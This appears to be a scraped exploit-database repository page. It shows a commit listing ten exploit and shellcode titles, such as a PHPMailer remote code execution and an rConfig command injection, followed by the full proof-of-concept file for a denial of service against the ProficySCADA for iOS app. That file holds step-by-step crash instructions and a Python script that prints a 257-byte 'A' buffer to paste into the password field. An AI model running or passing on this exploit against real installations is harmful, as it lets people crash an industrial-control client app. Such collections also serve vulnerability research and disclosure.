b84d953124
10 changes to exploits/shellcodes ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC) Google Chrome 80.0.3987.87 - Heap-Corruption Remote Denial of Service (PoC) CyberArk PSMP 10.9.1 - Policy Restriction Bypass PHPMailer < 5.2.18 - Remote Code Execution (Bash) FIBARO System Home Center 5.021 - Remote File Include rConfig 3.9.4 - 'search.crud.php' Remote Command Injection Joomla! com_hdwplayer 4.2 - 'search.php' SQL Injection Windows\x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes) Windows\x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes) Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes) Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)
24 lines
No EOL
669 B
Python
Executable file
24 lines
No EOL
669 B
Python
Executable file
# Exploit Title: ProficySCADA for iOS 5.0.25920 - 'Password' Denial of Service (PoC)
|
|
# Author: Ivan Marmolejo
|
|
# Date: 2020-03-22
|
|
# Vendor Homepage: https://apps.apple.com/us/app/proficyscada/id525792142
|
|
# Software Link: App Store for iOS devices
|
|
# Tested Version: 5.0.25920
|
|
# Vulnerability Type: Denial of Service (DoS) Local
|
|
# Tested on OS: iPhone 6s iOS 13.3
|
|
|
|
Steps to Produce the Crash:
|
|
1.- Run python code: ProficySCADA.py
|
|
2.- Copy content to clipboard
|
|
3.- Open "ProficySCADA for iOS"
|
|
4.- Add
|
|
5.- Username --> admin
|
|
6.- Paste ClipBoard on "Password"
|
|
7.- Add
|
|
8.- Connect
|
|
9.- Crashed
|
|
|
|
#!/usr/bin/env python
|
|
|
|
buffer = "\x41" * 257
|
|
print (buffer) |